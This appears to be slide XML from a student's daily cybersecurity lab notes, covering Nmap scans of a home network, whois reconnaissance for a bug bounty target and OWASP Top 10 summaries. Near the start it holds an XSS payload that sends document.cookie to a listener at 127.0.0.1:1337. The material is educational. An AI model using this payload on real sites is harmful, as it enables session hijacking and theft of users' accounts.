            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>windows.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>='http://127.0.0.1:1337/?cookie=</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect t="15858" b="40380"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2686635" y="3673337"/>
            <a:ext cx="6689185" cy="2280298"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143478388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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect t="3897" b="34158"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3871168" y="301705"/>
            <a:ext cx="3212212" cy="3793777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect t="13418" b="40536"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3017409" y="4446453"/>
            <a:ext cx="5942965" cy="2060575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21137772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166AC0E-49E5-4876-970E-00A994342195}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1117600" y="279400"/>
            <a:ext cx="10109200" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FD119E6-19B6-4047-A536-EACF6A9083C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1275008" y="138792"/>
            <a:ext cx="12192000" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                  DAY -6</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> checking connected devices to our network</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA62D40F-5200-4D86-A544-D8A27FCF573C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4549462" y="1377552"/>
            <a:ext cx="6899275" cy="5016758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Step -1</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Open kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Step -2</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Open terminal and</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> apt packages </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Step -3</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Step -4</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Enter password</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Step -5 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Enter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>cmnd</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Apt update</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>It updates packages </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Step -6</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Enter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>cmnd</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Apt upgrade</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="323692245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67F4458-90D8-44B2-B671-AD648D0E90A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1745266" y="1249465"/>
            <a:ext cx="9220199" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>packages are upgraded</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>step -7</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Enter command </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> 192.168.0.0/24 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>To scan connected devices to our network</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> @kali)-[-]</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> 192.168.0.0/24</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Starting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> 7.94 (https://nmap.org ) at 2023-07-18 14:34 IST</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> done: 256 IP addresses (0 hosts up) scanned in 105.08 seconds</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>nected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> devices to our network</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279572643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672B85A-7384-4E3D-9156-DF39EE382279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2047741" y="240259"/>
            <a:ext cx="11937999" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                          DAY -7</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Owasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to 10 vulnerabilities  understanding</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C835C65-1179-4DE6-8234-96ED894E7104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1561742" y="2450205"/>
            <a:ext cx="9423399" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Broken Access Control is a type of cyber attack that exploits vulnerabilities in a web application's access control mechanisms. It can allow attackers to gain unauthorized access to sensitive data or functionality. Broken Access Control can be caused by a lack of input validation, poor session management, or insufficient authorization checks. To prevent Broken Access Control attacks, developers should implement proper access controls, enforce strong authentication and authorization policies, and regularly test their applications for vulnerabilities. Attackers can use Broken Access Control to steal sensitive data, modify or delete data, or take control of an application. Broken Access Control can be prevented by using strong passwords, implementing multi-factor authentication, and regularly updating software and security systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Attackers can exploit broken access control to steal sensitive data, modify or delete data, or take control of an application. Broken access control can be prevented by implementing proper access controls, using secure network protocols, and following best practices for secure coding. Developers should ensure that only authorized users have access to sensitive data and functionality.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3549762" y="1481403"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Broken Access Control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20210610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43B5825-947B-470D-AF12-FD63ACB6CE24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1232346" y="0"/>
            <a:ext cx="10125777" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DAY -1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Bug Bounty</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E10A8F0F-3C77-46F4-AFB8-9CCBDE6D7AF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3206839" y="1868010"/>
            <a:ext cx="7547019" cy="4462760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>                                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Task -1</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Step -1 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>First open a browser then search Bug Bounty Program as a vulnerable website</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Step -2</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>In this step I select a website(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Snapchat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>) now find that domain name of the website.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Step -3 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>I choose snapchat.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Step -4 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Now open OSNIT Framework in new tab </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Step -5</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Domain name -&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> records –&gt; Domain Dossier it will give some information</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104544176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D0048C4-09CE-4316-99FE-3B7131268E70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2228045" y="543593"/>
            <a:ext cx="12191999" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Other measures include implementing role-based access control, using encryption, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>and using secure session management techniques. Developers should also ensure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> that access controls are properly tested and monitored to detect any vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87F8BECA-E06C-4C5B-BF94-501203E52D31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1146397" y="3152000"/>
            <a:ext cx="10312399" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cryptographic failure is a type of security vulnerability that occurs when encryption and decryption mechanisms are not implemented correctly. Cryptographic failure can be caused by weak encryption algorithms, improper key management, or flawed implementation of encryption protocols. Cryptographic failure can lead to data breaches, identity theft, and other types of cyber attacks. To prevent cryptographic failure, developers should use strong encryption algorithms, implement secure key management, and follow best practices for encryption implementation. Attackers can exploit cryptographic failure to decrypt sensitive data, impersonate legitimate users, or execute other types of cyber attacks. Cryptographic failure can be prevented by using strong encryption algorithms, implementing secure key management, and regularly updating software and security systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
